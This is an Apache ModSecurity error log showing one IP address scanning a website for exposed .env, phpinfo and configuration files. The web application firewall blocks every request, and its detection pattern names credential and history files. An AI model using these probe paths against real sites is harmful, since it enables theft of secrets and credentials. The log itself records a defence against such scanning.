[Tue May 26 15:15:21.513677 2026] [security2:error] [pid 700087:tid 700167] [remote 195.178.110.199:35698] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/admin-app/.env"] [unique_id "ahVrsZPHQM4as9fEIIZ7KQAAaE8"]
[Tue May 26 15:15:21.636180 2026] [security2:error] [pid 700087:tid 700165] [remote 195.178.110.199:35698] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.pronumbers.com.au"] [uri "/admin/phpinfo.php"] [unique_id "ahVrsZPHQM4as9fEIIZ7NQAAVU0"]
[Tue May 26 15:15:21.636544 2026] [security2:error] [pid 700087:tid 700195] [remote 195.178.110.199:35698] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.pronumbers.com.au"] [uri "/admin_phpinfo.php"] [unique_id "ahVrsZPHQM4as9fEIIZ7NwAAVWs"]
[Tue May 26 15:15:21.638854 2026] [security2:error] [pid 700087:tid 700174] [remote 195.178.110.199:35698] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/api-backend/.env"] [unique_id "ahVrsZPHQM4as9fEIIZ7OgAAVVY"]
[Tue May 26 15:15:21.640456 2026] [security2:error] [pid 700087:tid 700192] [remote 195.178.110.199:35698] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/api-node/.env"] [unique_id "ahVrsZPHQM4as9fEIIZ7OwAAVWg"]
[Tue May 26 15:15:21.746036 2026] [security2:error] [pid 700087:tid 700194] [remote 195.178.110.199:35698] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/api/.env"] [unique_id "ahVrsZPHQM4as9fEIIZ7PwAAVWo"]
[Tue May 26 15:15:21.768005 2026] [security2:error] [pid 700087:tid 700201] [remote 195.178.110.199:35698] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.pronumbers.com.au"] [uri "/api/info.php"] [unique_id "ahVrsZPHQM4as9fEIIZ7SwAAVXE"]
[Tue May 26 15:15:21.873377 2026] [security2:error] [pid 700087:tid 700091] [remote 195.178.110.199:35698] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.pronumbers.com.au"] [uri "/api/phpinfo.php"] [unique_id "ahVrsZPHQM4as9fEIIZ7XwAAVQM"]
[Tue May 26 15:15:21.895181 2026] [security2:error] [pid 700087:tid 700099] [remote 195.178.110.199:35698] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/apis/.env"] [unique_id "ahVrsZPHQM4as9fEIIZ7agAAVQs"]
[Tue May 26 15:15:21.941088 2026] [security2:error] [pid 700087:tid 700197] [remote 195.178.110.199:35698] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/administrator/.env"] [unique_id "ahVrsZPHQM4as9fEIIZ7OAAAVW0"]
[Tue May 26 15:15:22.016285 2026] [security2:error] [pid 700087:tid 700211] [remote 195.178.110.199:35698] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/app/.env"] [unique_id "ahVrspPHQM4as9fEIIZ7cAAALHs"]
[Tue May 26 15:15:22.146093 2026] [security2:error] [pid 700087:tid 700123] [remote 195.178.110.199:35698] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/application/.env"] [unique_id "ahVrspPHQM4as9fEIIZ7hwAAPyM"]
[Tue May 26 15:15:22.146958 2026] [security2:error] [pid 700087:tid 700121] [remote 195.178.110.199:35698] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/apps/.env"] [unique_id "ahVrspPHQM4as9fEIIZ7iAAAPyE"]
[Tue May 26 15:15:22.398942 2026] [security2:error] [pid 700087:tid 700162] [remote 195.178.110.199:35698] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/back-api/.env"] [unique_id "ahVrspPHQM4as9fEIIZ7rgAAYUo"]
[Tue May 26 15:15:22.399838 2026] [security2:error] [pid 700087:tid 700178] [remote 195.178.110.199:35698] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/back/.env"] [unique_id "ahVrspPHQM4as9fEIIZ7sAAAYVo"]
[Tue May 26 15:15:22.400109 2026] [security2:error] [pid 700087:tid 700161] [remote 195.178.110.199:35698] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/back-end/.env"] [unique_id "ahVrspPHQM4as9fEIIZ7rwAAYUk"]
[Tue May 26 15:15:22.400439 2026] [security2:error] [pid 700087:tid 700094] [remote 195.178.110.199:35698] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/backend-api/.env"] [unique_id "ahVrspPHQM4as9fEIIZ7sQAAYQY"]
[Tue May 26 15:15:22.401431 2026] [security2:error] [pid 700087:tid 700141] [remote 195.178.110.199:35698] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/backend/.env"] [unique_id "ahVrspPHQM4as9fEIIZ7sgAAYTU"]
[Tue May 26 15:15:22.524245 2026] [security2:error] [pid 700087:tid 700167] [remote 195.178.110.199:35698] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/backup/.env"] [unique_id "ahVrspPHQM4as9fEIIZ7xwAARE8"]
[Tue May 26 15:15:22.525506 2026] [security2:error] [pid 700087:tid 700181] [remote 195.178.110.199:35698] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/be/.env"] [unique_id "ahVrspPHQM4as9fEIIZ7yAAARF0"]
[Tue May 26 15:15:22.526836 2026] [security2:error] [pid 700087:tid 700189] [remote 195.178.110.199:35698] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/beta/.env"] [unique_id "ahVrspPHQM4as9fEIIZ7yQAARGU"]
[Tue May 26 15:15:22.648939 2026] [security2:error] [pid 700087:tid 700195] [remote 195.178.110.199:35698] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/client/.env"] [unique_id "ahVrspPHQM4as9fEIIZ71QAAIms"]
[Tue May 26 15:15:22.653212 2026] [security2:error] [pid 700087:tid 700196] [remote 195.178.110.199:35698] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.pronumbers.com.au"] [uri "/config.php"] [unique_id "ahVrspPHQM4as9fEIIZ73wAAImw"]
[Tue May 26 15:15:22.653711 2026] [security2:error] [pid 700087:tid 700175] [remote 195.178.110.199:35698] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/cms/.env"] [unique_id "ahVrspPHQM4as9fEIIZ72gAAIlc"]
[Tue May 26 15:15:22.774947 2026] [security2:error] [pid 700087:tid 700199] [remote 195.178.110.199:35698] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/config/.env"] [unique_id "ahVrspPHQM4as9fEIIZ75gAAMm8"]
[Tue May 26 15:15:22.779167 2026] [security2:error] [pid 700087:tid 700200] [remote 195.178.110.199:35698] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.pronumbers.com.au"] [uri "/config/aws.php"] [unique_id "ahVrspPHQM4as9fEIIZ76wAAMnA"]
[Tue May 26 15:15:22.781196 2026] [security2:error] [pid 700087:tid 700208] [remote 195.178.110.199:35698] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.pronumbers.com.au"] [uri "/config/config.inc.php"] [unique_id "ahVrspPHQM4as9fEIIZ77gAAMng"]
[Tue May 26 15:15:22.783974 2026] [security2:error] [pid 700087:tid 700091] [remote 195.178.110.199:35698] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.pronumbers.com.au"] [uri "/config/config.php"] [unique_id "ahVrspPHQM4as9fEIIZ78AAALwM"]
[Tue May 26 15:15:22.901122 2026] [security2:error] [pid 700087:tid 700209] [remote 195.178.110.199:35698] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.pronumbers.com.au"] [uri "/config/env.php"] [unique_id "ahVrspPHQM4as9fEIIZ7_AAANXk"]
[Tue May 26 15:15:22.904369 2026] [security2:error] [pid 700087:tid 700097] [remote 195.178.110.199:35698] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.pronumbers.com.au"] [uri "/config/module.config.php"] [unique_id "ahVrspPHQM4as9fEIIZ8AAAANQk"]
[Tue May 26 15:15:22.905765 2026] [security2:error] [pid 700087:tid 700098] [remote 195.178.110.199:35698] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.pronumbers.com.au"] [uri "/config/nexmo.php"] [unique_id "ahVrspPHQM4as9fEIIZ8AQAANQo"]
[Tue May 26 15:15:22.915275 2026] [security2:error] [pid 700087:tid 700104] [remote 195.178.110.199:35698] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.pronumbers.com.au"] [uri "/config/stripe.php"] [unique_id "ahVrspPHQM4as9fEIIZ8CAAAVRA"]
[Tue May 26 15:15:22.934039 2026] [security2:error] [pid 700087:tid 700289] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVrspPHQM4as9fEIIZ7uwAAAEg"]
[Tue May 26 15:15:23.043312 2026] [security2:error] [pid 700087:tid 700118] [remote 195.178.110.199:35698] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/crm/.env"] [unique_id "ahVrs5PHQM4as9fEIIZ8GwAAPB4"]
[Tue May 26 15:15:23.061327 2026] [security2:error] [pid 700087:tid 700114] [remote 195.178.110.199:35698] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/cron/.env"] [unique_id "ahVrs5PHQM4as9fEIIZ8HAAAPBo"]
[Tue May 26 15:15:23.079433 2026] [security2:error] [pid 700087:tid 700111] [remote 195.178.110.199:35698] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/current/.env"] [unique_id "ahVrs5PHQM4as9fEIIZ8HQAAPBc"]
[Tue May 26 15:15:23.154205 2026] [security2:error] [pid 700087:tid 700125] [remote 195.178.110.199:35698] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/demo/.env"] [unique_id "ahVrs5PHQM4as9fEIIZ8HwAAYCU"]
[Tue May 26 15:15:23.157540 2026] [security2:error] [pid 700087:tid 700121] [remote 195.178.110.199:35698] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/dev/.env"] [unique_id "ahVrs5PHQM4as9fEIIZ8IQAAdyE"]
[Tue May 26 15:15:23.160157 2026] [security2:error] [pid 700087:tid 700126] [remote 195.178.110.199:35698] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/developer/.env"] [unique_id "ahVrs5PHQM4as9fEIIZ8JAAAdyY"]
[Tue May 26 15:15:23.160221 2026] [security2:error] [pid 700087:tid 700130] [remote 195.178.110.199:35698] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/development/.env"] [unique_id "ahVrs5PHQM4as9fEIIZ8JQAAdyo"]
[Tue May 26 15:15:23.160315 2026] [security2:error] [pid 700087:tid 700124] [remote 195.178.110.199:35698] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/develop/.env"] [unique_id "ahVrs5PHQM4as9fEIIZ8IwAAdyQ"]
[Tue May 26 15:15:23.167381 2026] [cgid:error] [pid 700087:tid 700129] [remote 195.178.110.199:35698] AH01264: stderr from /home1/pronuyyv/public_html/dnscfg.cgi: script not found or unable to stat
[Tue May 26 15:15:23.295160 2026] [security2:error] [pid 700087:tid 700157] [remote 195.178.110.199:35698] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/erp/.env"] [unique_id "ahVrs5PHQM4as9fEIIZ8NwAALkU"]
